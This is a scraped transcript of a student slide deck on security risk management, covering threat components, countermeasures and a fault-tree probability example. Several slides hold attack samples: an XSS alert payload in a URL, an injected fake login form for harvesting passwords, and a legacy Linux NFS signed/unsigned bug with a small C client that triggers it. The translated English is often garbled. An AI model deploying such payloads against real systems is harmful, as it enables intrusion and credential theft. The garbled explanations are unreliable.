1 / 28

Risk Management

Risk Management. C o mpany name. Prepared By Mahmoud elmadhoun Supervised By Ms : eman elagrami. Agenda. The definition of Risk, and the sections Countermeasures in the event of Risk How to manage the Risk and probability. The definition of Risk and the sections.

meli
Download Presentation

Risk Management

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Risk Management Company name Prepared By Mahmoud elmadhoun Supervised By Ms : eman elagrami

  2. Agenda • The definition of Risk, and the sections • Countermeasures in the event of Risk • How to manage the Risk and probability

  3. The definition of Risk and the sections • The Risk is there is probably a threat and therefore can be exploited if used that threat might be called the Vulnerability • Of this definition could be to separate the main sections of the Risk • Threat-: is the process of trying to access to confidential information of the Organization • Vulnerabilities: and that there are weaknesses in the organization can engage in which the attacker

  4. Vulnerabilities • Composed of two types and two • Technical Vulnerability :whether weak immunization and use of this vulnerability before the attacker knows the attack, the attack of technical • Administrative Vulnerability :Attack is the so-called non-technical or social engineering attack

  5. Vulnerabilities • And can be divided in terms of ease and difficulty of the two • High-level Vulnerability: an example is easy to use in writing software code to exploit that gap • Low-level Vulnerability: is the use of the most difficult and requires a lot of sources of financial sources or a long time the attacker

  6. Example • Vulnerability of XSS (Cross Site Scripting) • HTML ,JavaScript ,VBscript,ActiveX,Flash ) • Amend the URL address for a given site • <Scriptlanguage="Javascript">alert('Welcome')</script> • http://www.example.com/search?keyword=<Script language="Javascript">alert('Welcome')</script>

  7. <br><br>Please login with the form below before proceeding:<form action="destination.asp"><table><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr><td>Password:</td><td><input type=text length=20 name=password></td></tr></table><input type=submit value=LOGIN></form>

  8. Vulnerabilitiesunsigned linux-2.4, signed/unsigned static inline u32* decode_fh(u32 *p, struct svc_fh *fhp) { unsigned int size; fh_init(fhp, NFS3_FHSIZE); size = ntohl(*p++); if (size > NFS3_FHSIZE) return NULL; memcpy(&fhp->fh_handle.fh_base, p, size); fhp->fh_handle.fh_size = size; return p + XDR_QUADLEN(size); }

  9. كود#include <rpcsvc/nfs_prot.h> • #include <rpc/rpc.h> • #include <rpc/xdr.h> • #include <netinet/in.h> • #include <sys/socket.h> • #include <sys/types.h> • #define NFSPROG 100003 • #define NFSVERS 3 • #define NFSPROC_GETATTR 1 • static struct diropargs heh; • bool_t xdr_heh(XDR *xdrs, diropargs *heh) • { • int32_t werd = -1; • return xdr_int32_t(xdrs, &werd); • } • int main(void) • { • CLIENT * client; • struct timeval tv; • client = clnt_create("marduk", NFSPROG, NFSVERS, "udp"); • if(client == NULL) { • perror("clnt_create\n"); • } • tv.tv_sec = 3; • tv.tv_usec = 0; • client->cl_auth = authunix_create_default(); • clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh, • (xdrproc_t) xdr_void, NULL, tv); • return 0; • }

  10. Threat • There are three essential components of a threat • Target • Agent • Event

  11. Target • Is the organization's information and the attacker can work on each of the following • Confidentiality: disclosure and that the confidential information to others • Integrity: possibility of changing the organization's information • Availability: and by denial of service via Dos • Accountability: It is not punished for it by the attacker to conceal the attack

  12. Agents • There must be three features • Access to the target: it may be a direct access to any account has to enter the system and may be indirectly through an intermediary • Knowledge about the target • Motivation

  13. Events • Is in many ways be the most important and ill-authorized access, and others authorized to information or the system either through the development of malicious codes (viruses or Trojan) of the Regulations

  14. Countermeasures in the event of Risk • There is no doubt that the information varies from facility to facility and information according to the institution by institution, the importance of information to take appropriate action may be to intervene before a danger, and called the Proactive Model and intervention may be after the occurrence of danger and called the Reactive Model

  15. Countermeasures in the event of Risk • There are some examples of countermeasures to the threat or attack • Firewalls • Anti-virus software • Access Control • Two-factor authentication systems • Well-trained employees

  16. How to manage the Risk and probability • Steps involved in risk management • Risk Analysis • Decision Management • Implementation

  17. How to manage the Risk and probability • Risk management, where intervention is divided into two sections: • Reactive Model: It is a very famous type is the so-called emotional intervention For example, a security official in the company to download anti-virus program after the virus is spreading and destroying some devices can be calculated as follows Protection cost = total cost of the risk + the cost of countermeasures

  18. How to manage the Risk and probability • Proactive Model :Prior to the Risk of this type is much better in terms of cost Protection cost = cost of the minimum risk + the cost of countermeasures

  19. How to manage the Risk and probability • Account the possibility of a threat: • the beginning of the top of any tree to be in the form of • The search for the roads leading to the occurrence of or potential threat • The collection of these methods to use (or ,And( • to calculate the potential, we start from the top down

  20. How to manage the Risk and probability

  21. How to manage the Risk and probability • Example • When the attacker tries to break the password Root • Either that the attacker tries to find the root of the word by guessing Guessing the root password • Or attack the network as a whole to try and there Bugs in the network • And at this point is to achieve two of Bugs 1-there are gaps that can be exploited (And, or) must verify the conditionII with 2-that does not happen the system (b Trigram any potential path for this gap

  22. How to manage the Risk and probability

  23. How to manage the Risk and probability • P(guessing root password = A) = 5/1000 = 0.005 • P(exploiting (( active server = B) = 50 /1000 = 0.05 (AND) • P (system is not updated or not configured properly =C) = 0.1

  24. How to manage the Risk and probability • Assumptions made in the guess a password equal to the exploitation of the gap and b, the latter if there is no system c • P(attack service =BC) = P(B)*P(C) = 0.05 * 0.1 = 0.005 ( AND) • P(break-in = (total)(P(A)+P(BC)-P(A)P(BC) = 0.005+0.005 – 0.005 *0.005 = 0.009975 ( OR) • (Total Probability ) break0in 0.009975 .

  25. Reference • http://www.c4arab.com/showlesson.php?lesid=1756 • http://www.c4arab.com/showlesson.php?lesid=175 • Prentice.Hall.Cryptography.and.Network.Security.4th.Edition.Nov.2005

  26. Thanks

More Related